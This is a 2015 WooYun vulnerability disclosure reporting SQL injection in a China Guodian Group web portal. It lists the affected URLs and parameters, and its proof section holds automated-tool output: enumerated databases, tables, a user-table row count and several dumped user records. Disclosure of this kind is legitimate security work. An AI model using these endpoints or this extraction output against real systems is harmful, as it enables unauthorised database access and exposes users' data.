当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151580

漏洞标题:国电集团某站多处SQL注入漏洞DBA权限(用户信息泄露)

相关厂商:中国国电集团公司

漏洞作者: 路人甲

提交时间:2015-11-04 14:03

修复时间:2015-11-09 14:04

公开时间:2015-11-09 14:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-04: 细节已通知厂商并且等待厂商处理中
2015-11-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

国电

详细说明:

http://www.gdmec.net/phx/newsInfo.action?oid=1000333455&typeId=13&typeName=%E7%BD%91%E7%AB%99%E5%85%AC%E5%91%8A  oid参数注入
http://www.gdmec.net/phx/newsList.action?typeId=14&typeName=%E4%BA%A7%E5%93%81%E9%A2%91%E9%81%93  typeId参数注入
http://www.gdmec.net/phx/newsDir.action?pid=2&ptypeName=%E7%89%A9%E8%B5%84%E9%9B%86%E5%9B%A2&typeName=  pid参数注入
http://www.gdmec.net/phx/newsInfo.action?oid=362416&pid=&typeId=14&ptypeName=&typeName=%E4%BA%A7%E5%93%81%E9%A2%91%E9%81%93&currentPage=1 oid参数
http://www.gdmec.net/phx/newsList.action?pid=&typeId=13&ptypeName=&typeName=%E7%BD%91%E7%AB%99%E5%85%AC%E5%91%8A&currentPage= typeId参数


g.jpg


漏洞证明:

available databases [28]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PHX3
[*] PHX3512
[*] PHXHIS0607
[*] PM
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] WMSYS
[*] XDB
Database: PHX3
[180 tables]
+--------------------------------+
| A                              |
| CCDDT_BID_PLAN                 |
| CCDDT_BUNDLE_SUPP              |
| CCDPHX_COMPANY                 |
| CHENJINGQIAO20140402_BAK       |
| DESKTOP_CORE_FILES             |
| DESKTOP_LAUNCHERS              |
| DESKTOP_MODULES                |
| DESKTOP_MODULES_HAS_FILES      |
| DESKTOP_MODULES_HAS_LAUNCHERS  |
| DESKTOP_ROLES_HAS_MODULES      |
| DESKTOP_STYLES                 |
| DESKTOP_THEMES                 |
| DESKTOP_WALLPAPERS             |
| DT_BID_AUTHORIZER              |
| DT_BID_BANK                    |
| DT_BID_BUNDLE                  |
| DT_BID_BUNDLE_FILE             |
| DT_BID_DEPOSIT                 |
| DT_BID_DEPOSIT_214             |
| DT_BID_DEPOSIT_ALL214          |
| DT_BID_DEPOSIT_ALLLIFE         |
| DT_BID_DEPOSIT_BANK_FORM       |
| DT_BID_DEPOSIT_BANK_INFO       |
| DT_BID_DEPOSIT_BANK_INFO0227   |
| DT_BID_DEPOSIT_HISTORY         |
| DT_BID_DEPOSIT_HISTORY214      |
| DT_BID_DEPOSIT_HISTORY302      |
| DT_BID_DEPOSIT_HISTORY320      |
| DT_BID_DEPOSIT_HISTORY_ALLLIFE |
| DT_BID_DEPOSIT_TEMP            |
| DT_BID_DEPOSIT_TEMP1           |
| DT_BID_DESC                    |
| DT_BID_FILE                    |
| DT_BID_MESH                    |
| DT_BID_MESH_PLAN               |
| DT_BID_ORG_SYN                 |
| DT_BID_PLAN                    |
| DT_BID_PLAN_1                  |
| DT_BID_PLAN_OLD                |
| DT_BID_SUPP_AUTHORIZER_BANK    |
| DT_BID_TAST                    |
| DT_BUNDLE_DESC                 |
| DT_BUNDLE_INVITATION_SUPP      |
| DT_BUNDLE_MATERIAL             |
| DT_BUNDLE_OPEN_MASTER          |
| DT_BUNDLE_SUPP                 |
| DT_BUNDLE_SUPP_FILE            |
| DT_BUNDLE_SUPP_PROFILE         |
| DT_BUNDLE_SUPP_STATE           |
| DT_BUYER                       |
| DT_CHARACTER_RCORD             |
| DT_CLARIFY_FILE                |
| DT_CLARIFY_INFO                |
| DT_CLARIFY_RELATION            |
| DT_COMPANY_PROFILE             |
| DT_DIDDER_OPERATE_RECORD       |
| DT_FICTIVE_ROOM                |
| DT_FY_DETAIL_LEAGUER           |
| DT_FY_DETAIL_LEAGUER_BACK      |
| DT_MEMBER_PROFILE_REGULAR      |
| DT_OPENER_OPERATE_RECORD       |
| DT_PL_MAIN                     |
| DT_PL_MAIN_MORE                |
| DT_PRODUCT                     |
| DT_PRODUCT_CLASS               |
| DT_PROD_AREAS                  |
| DT_SUPERVISE_OPERATE_RECORD    |
| DT_SUPPLIER                    |
| DT_SUPPLIER_OPEN_STATUS        |
| DT_TAST_CODE_RETAIN            |
| DT_TAST_CODE_SEQ               |
| DT_USER_PROFILE                |
| DT_VIDEO_POOL                  |
| DT_VIDEO_SRC                   |
| DX_BAK_20140219                |
| DX_BAK_20140412                |
| FUND_SURPLUS                   |
| IBMSNAP_PRUNCNTL               |
| IBMSNAP_PRUNE_SET              |
| IBMSNAP_REGISTER               |
| IBMSNAP_REG_SYNCH              |
| IBMSNAP_SIGNAL                 |
| JBPM4EXT_DEPLOYMENT            |
| JBPM4EXT_PROC_DEF_ND_ACTION    |
| JBPM4EXT_PROC_DEF_ND_ACTION_T  |
| JBPM4EXT_PROC_DEF_ND_ACT_VAR   |
| JBPM4EXT_PROC_DEF_NODE         |
| JBPM4EXT_PROC_DEF_NODE_TYPE    |
| JBPM4EXT_PROC_DEF_PARTICIPATOR |
| JBPM4EXT_PROC_DEF_PART_VAR     |
| JBPM4EXT_PROC_DEF_SWIMLANE     |
| JBPM4EXT_PROC_DEF_TRANSATION   |
| JBPM4EXT_PROC_DEF_TR_ACTION    |
| JBPM4EXT_PROC_DEF_TR_ACTION_T  |
| JBPM4EXT_PROC_DEF_TR_ACT_VAR   |
| JBPM4EXT_PROC_INST             |
| JBPM4EXT_TASK_INFO             |
| JBPM4TEST                      |
| JBPM4_DEPLOYMENT               |
| JBPM4_DEPLOYPROP               |
| JBPM4_EXECUTION                |
| JBPM4_HIST_ACTINST             |
| JBPM4_HIST_DETAIL              |
| JBPM4_HIST_PROCINST            |
| JBPM4_HIST_TASK                |
| JBPM4_HIST_VAR                 |
| JBPM4_JOB                      |
| JBPM4_LOB                      |
| JBPM4_PARTICIPATION            |
| JBPM4_PROPERTY                 |
| JBPM4_SWIMLANE                 |
| JBPM4_TASK                     |
| JBPM4_VARIABLE                 |
| MEMBER_PROFILE_REGULAR_BACK    |
| MR_PROD_AREAS                  |
| NEWS_CLASS                     |
| NEWS_CLASS_RE_COMPANY          |
| NEWS_FILE                      |
| NEWS_INFO                      |
| NEWS_STAT                      |
| PEC_BID_PROJECT                |
| PEC_FILE                       |
| PEC_MEMBER_PROFILE_REGULAR     |
| PEC_UPLOAD_FILE                |
| PHX_ATTRIBUTE                  |
| PHX_ATTRIBUTE_FORMAT           |
| PHX_ATTRIBUTE_TYPE             |
| PHX_COMPANY                    |
| PHX_COMPANY_TYPE               |
| PHX_COMPANY_TYPE_RE_ROLES      |
| PHX_DEPARTMENT                 |
| PHX_LOG                        |
| PHX_LOG_DEAL_STATUS            |
| PHX_LOG_TYPE                   |
| PHX_MENU_INFO                  |
| PHX_ORGANIZATION               |
| PHX_ORGANIZATION_TYPE          |
| PHX_ORG_USERS_RELATION         |
| PHX_PACKAGE                    |
| PHX_ROLES                      |
| PHX_SCHEMA                     |
| PHX_SCHEMA_HELP                |
| PHX_SCHEMA_TYPE                |
| PHX_SECURITY_LEVEL             |
| PHX_SERVICE                    |
| PHX_SERVICE_BAK                |
| PHX_SERVICE_CATALOG            |
| PHX_SERVICE_CLOB               |
| PHX_SERVICE_CONDITION          |
| PHX_SERVICE_ELEMENT            |
| PHX_SERVICE_ELEMENT_STYLE      |
| PHX_SERVICE_ELEMENT_TYPE       |
| PHX_SERVICE_HELP               |
| PHX_SERVICE_MENUBAR            |
| PHX_SERVICE_REF_SCHEMAS        |
| PHX_SERVICE_ROLES_RELATION     |
| PHX_SERVICE_TYPE               |
| PHX_TEMPL_QUERY                |
| PHX_TEMPL_QUERY_ITEM           |
| PHX_TIPS                       |
| PHX_TIPS_TYPE                  |
| PHX_USERS                      |
| PHX_USERS_ROLES_RELATIONS      |
| PHX_VERSION                    |
| PHX_ZONE                       |
| SMARTTEST                      |
| SMRT                           |
| SMRT_TEST                      |
| SMRT_UNSUCCESS_BAK_20130613    |
| TEMP_QSX_20130822              |
| TEMP_REALBUYER                 |
| TEST                           |
| TEST1                          |
| TEST1TREE                      |
| TEST2                          |
| TEST2012                       |
| TESTDY                         |
| TEST_COMPANY                   |
| TEXT_IMPORT_20130827           |
+--------------------------------+
Database: PHX3
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| PHX_USERS | 77976   |
+-----------+---------+


-------+------+------+--------+---------+----------+----------+---------------------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+--------------+-----------------+------------------+--------------------+
| OID   | NAME | ROLE | GENDER | COMPANY | USER_TEL | PASSWORD | USER_NAME                 | SELF_STYLE | USER_EMAIL | DEPARTMENT | RUN_STATUS | CREATE_DATE | USER_MOBILE | MODIFY_FLAG | DELETE_FLAG | USER_COMPANY | CODE_SPECIALITY | CERTIFICATE_TYPE | CERTIFICATE_NUMBER |
+-------+------+------+--------+---------+----------+----------+---------------------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+--------------+-----------------+------------------+--------------------+
| 68449 | NULL | NULL | NULL   | 29205   | NULL     | NULL     | 29205 $ tsest1234 $       | 3          | NULL       | NULL       | 1          | 23-11月-09   | NULL        | NULL        | 1           | NULL         | NULL            | NULL             | NULL               |
| 69186 | NULL | NULL | NULL   | 29532   | NULL     | NULL     | 29532 $ 平阳化工机械总厂 $        | 3          | NULL       | NULL       | 1          | 19-12月-09   | NULL        | NULL        | 1           | NULL         | NULL            | NULL             | NULL               |
| 47489 | NULL | NULL | NULL   | 20464   | NULL     | NULL     | 20464 $ 四川爆破公司 $          | 3          | NULL       | NULL       | 1          | 18-9月 -07   | NULL        | NULL        | 1           | NULL         | NULL            | NULL             | NULL

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-09 14:04

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无